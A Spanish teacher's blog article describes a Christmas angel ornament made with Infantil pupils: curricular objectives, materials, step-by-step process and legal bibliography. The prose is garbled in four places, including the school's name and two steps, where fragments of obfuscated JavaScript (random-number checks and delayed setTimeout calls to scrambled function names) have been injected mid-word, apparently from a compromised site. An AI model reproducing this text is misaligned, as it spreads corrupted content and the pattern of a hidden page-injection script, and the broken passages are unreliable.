ANGELITOS DE NAVIDAD

Autora: Mª Isabel Gamero Pardo

          Durante la Navidad tiene lugar la conjunción de diversas tradiciones culturales: unas son propias, como los villancicos, el Nacimiento o los Reyes Magos; otras son foráneas, pero ya muy arraigadas entre nuestros niños, como es el caso del árbol de Navidad, Papá Noel o el calcetín de Navidad. Nosotros, como docentes encargados de la educación de nuestros alumnos, debemos atender a esta diversidad cultural y mostrar estas fechas en toda su amplitud.

           La actividad que a continuación presento se realizó el curso pasado en el CEIP “Hernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando de Soto” de Barcarrota (Badajoz) con los alumnos de Educación Infantil.


           Los objetivos que pretendíamos alcanzar fueron los siguientes:

  1. Iniciarse en el conocimiento de las tradiciones propias de la Comunidad (Decreto 4/2008, de 11 de enero, por el que se aprueba el currículo de Educación Infantil para la Comunidad Autónoma de Extremadura).
  2. Competencia cultural y artística (LOE).
  3. Realizar un adorno navideño para regalar a las familias.

           Los materiales que utilizamos para su elaboración fueron los siguientes:

  • Una fotografía tamaño carné de cada niño.
  • Una plantilla de angelito fotocopiada para cada niño.
  • Ceras de colores para la túnica, las manos, el cinturón, el pelo y las alas.
  • Purpurina en gel (dorada o plateada) o brillantina en polvo (dorada o plateada).
  • 30 cms. de cola de ratón de color amarillo, azul o rosa.

           A continuación se explica cómo fue el proceso para la realización del angelito:

  1.  Los niños colorearon con cera el angelito, que previamente habían picado, dejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la cara en blanco.
  2. Una vez que colorearon la lámina a su gusto, pegaron su foto en el espacio en blanco.
  3.  A continuación, los propios niños, decoraron el pelo y las alas del angelito con purpurina o brillantina, dorada o plateada.
  4.  Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la composición se secó, plastificamos el angelito y lo recortamos (los maestros).
  5. Para terminar, hicimos un agujero con un punzón para colocar la cola de ratón, que servirá para colgar el adorno de angelito en el árbol de Navidad.

           Con esta actividad pretendíamos que los niños pudieran “fabricar” su propio adorno navideño y, de paso, disfrutar con sus producciones artísticas.


 

Bibliografía:

-          LEY ORGÁNICA, 2/2006, de 3 de Mayo, de Educación, BOE, número 106 de 4/5/2006, páginas 17158 a 17207. 

-          DECRETO 4/2008, de 11 de enero, por el que se aprueba el Currículo de Educación Infantil para la Comunidad Autónoma de Extremadura, DOE, 18 de enero de 2008, núm. 12, p.1226-1272.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.